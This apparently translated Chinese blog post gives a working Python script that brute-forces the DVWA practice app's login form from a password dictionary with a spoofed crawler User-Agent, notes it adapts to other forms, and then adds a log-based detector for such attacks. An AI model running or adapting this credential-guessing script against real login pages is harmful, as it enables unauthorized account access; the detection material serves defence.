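I recently took some time to learn Python. My skills are still weak, and I have not yet got to grips with Python multithreading. I am still studying it in depth, so I spent a little time writing a small script for practice.
If you are interested in Python, please follow this article:
http://www.waitalone.cn/python-video.html
DVWA form cracking, single-threaded version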
```python
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/8/26
# Created by 独自等待
# Blog http://www.waitalone.cn/
# Python form cracking
import sys, time, urllib, httplib

starttime = time.time()


def usage():
    print '+' + '-' * 50 + '+'
    print '\t\tDVWA表单破解单线程版'
    print '\t Blog:http://www.waitalone.cn/'
    print '\t\t Code BY: 独自等待'
    print '\t\t Time:2014-08-26'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 4:
        print "用法: dvwacrack.py 待破解的域名 用户名 密码字典"
        print "实例: dvwacrack.py www.waitalone.cn admin pass.txt"
        sys.exit()


def crackDvwa(username='admin', password='password'):
    'DVWA form-cracking function, single-threaded version. Code BY: 独自等待'
    httpClient = None
    try:
        params = urllib.urlencode({'username': username, 'password': password, 'Login': '登陆'})
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Baiduspider'}
        httpClient = httplib.HTTPConnection(host, 80, timeout=10)
        httpClient.request('POST', '/dvwa/login.php', params, headers)
        response = httpClient.getresponse()
        # print response.status
        # print response.reason
        # print response.read()
        # print response.getheaders()
        # print dir(response.getheaders())
        # print response.getheader('Location')
    except Exception, msg:
        print '搞毛毛虫,网站都不能访问,请检查!', msg
        sys.exit()
    else:
        # A redirect to index.php is treated as a successful login
        if response.getheader('Location') == 'index.php':
            print '恭喜大爷,密码破解成功!用户名:%s\t密码:%s\n' % (username, password)
    finally:
        if httpClient:
            httpClient.close()


if __name__ == '__main__':
    usage()
    host = sys.argv[1]
    username = sys.argv[2]
    passdic = sys.argv[3]
    popen = None
    try:
        popen = open(passdic)
    except IOError, msg:
        print '字典读取错误!', msg
        sys.exit()
    else:
        # One request per dictionary line, sent sequentially
        plist = [x.rstrip() for x in popen.readlines()]
        print '字典加载成功,共有字典%d行!\n' % len(plist)
        for password in plist:
            crackDvwa(username, password)
        print '报告大爷,破解完成,小爷睡觉去了,拜拜喽!\n'
    finally:
        if popen:
            popen.close()
        endtime = time.time()
        print '脚本执行时间:', endtime - starttime, '秒'
```
To crack other forms, you can use this script as a reference; with a few changes it will work.
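Seen from the defending side, the script above leaves a clear trace in the web server's access log: one POST to /dvwa/login.php per dictionary word, all from the same client, sent with a crawler User-Agent (Baiduspider) that has no reason to submit a login form. The detection sketch below is an added example, not part of the original post; it is written in Python 3, and its log lines, thresholds and function names are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: ip, time, method, path, status, user agent.
LINE_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# Search-engine crawlers fetch pages; they do not submit login forms.
CRAWLER_UA = re.compile(r"baiduspider|googlebot|bingbot", re.I)

def sample_log():
    """Constructed sample lines (documentation IP ranges), not real traffic."""
    fmt = '%s - - [26/Aug/2014:10:%02d:%02d +0800] "%s %s HTTP/1.1" %d - "-" "%s"'
    login = "/dvwa/login.php"
    # Eight guesses in eight seconds, as the single-threaded script would send.
    burst = [fmt % ("192.0.2.10", 0, s, "POST", login, 302, "Baiduspider")
             for s in range(8)]
    # A person logging in twice, minutes apart.
    human = [fmt % ("198.51.100.7", m, 0, "POST", login, 302, "Mozilla/5.0")
             for m in (1, 5)]
    return burst + human

def detect_login_bruteforce(lines, login_path="/dvwa/login.php",
                            max_posts=5, window=timedelta(seconds=60)):
    """Return {client_ip: set_of_reasons} for suspicious login POSTs."""
    recent = defaultdict(deque)   # client ip -> timestamps inside the window
    alerts = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines in another format
        ip, ts, method, path, _status, agent = m.groups()
        if method != "POST" or path.split("?")[0] != login_path:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        times = recent[ip]
        times.append(when)
        while when - times[0] > window:   # slide the window forward
            times.popleft()
        if len(times) > max_posts:
            alerts[ip].add("login-post-rate")
        if CRAWLER_UA.search(agent):
            alerts[ip].add("crawler-ua-on-login")
    return dict(alerts)

if __name__ == "__main__":
    for ip, reasons in detect_login_bruteforce(sample_log()).items():
        print(ip, sorted(reasons))
```

The same per-client counter is what a login rate limit or temporary lockout enforces at request time; pass a different `login_path` to watch another form.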
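For a multithreaded implementation in PHP + cURL, please refer to the following article:
From www.waitalone.cn. Thanks for it.
Disclaimer: The programs (methods) discussed in this article may be offensive in nature and are provided for security research and teaching purposes only. Readers who use this information for other purposes bear all legal and joint liability; this site bears no legal or joint liability. If you have any questions, you can contact us by email (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page). Please take note.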